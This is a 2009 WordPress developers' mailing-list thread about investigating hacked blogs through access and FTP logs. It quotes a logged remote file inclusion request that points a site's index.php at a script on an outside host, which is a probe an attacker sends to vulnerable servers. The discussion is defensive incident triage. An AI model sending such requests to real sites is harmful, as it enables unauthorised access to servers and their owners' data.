[wp-hackers] Hacked blogs

Joost de Valk joost at yoast.com
Thu Mar 26 16:00:53 GMT 2009


Exactly, it's a check.

Going through the access logs I can't find anything else yet though, 
what we DO see on one of the hosts is that the "infected" files were 
uploaded through FTP (we can see that in the xfer.log), but if I'm not 
mistaken, that could still be done through XSS right?

Dinh Ba Thanh wrote:
> If the attacker is able to inject that chunk of code, other things 
> could be include as well, eg: shell
>
> Best Regards,
> Dinh Ba Thanh, Jason
> bathanh at gmail.com
>
>
>
>
> On Mar 26, 2009, at 11:53 PM, Peter van der Does wrote:
>
>> On Thu, 26 Mar 2009 16:44:01 +0100
>> Joost de Valk <joost at yoast.com> wrote:
>>
>>> Nope, can't find a bloody thing yet. These kind of requests:
>>>
>>> GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt????
>>> HTTP/1.1
>>>
>>> in all the logs, but grepping through the entire htdocs dir, nothing
>>> that responds to them. 
>>
>> I don't believe that attack is what caused your problem.
>> The script that is called is a killroy script.
>> It will show server related information, like the OS, Uptime. Stuff
>> like that and "<insert name> was here .."
>>
>> -- 
>> Peter van der Does
>>
>> GPG key: E77E8E98
>>
>> WordPress Plugin Developer
>> http://blog.avirtualhome.com
>>
>> GetDeb Package Builder/GetDeb Site Coder
>> http://www.getdeb.net - Software you want for Ubuntu
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers 
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers 


More information about the wp-hackers mailing list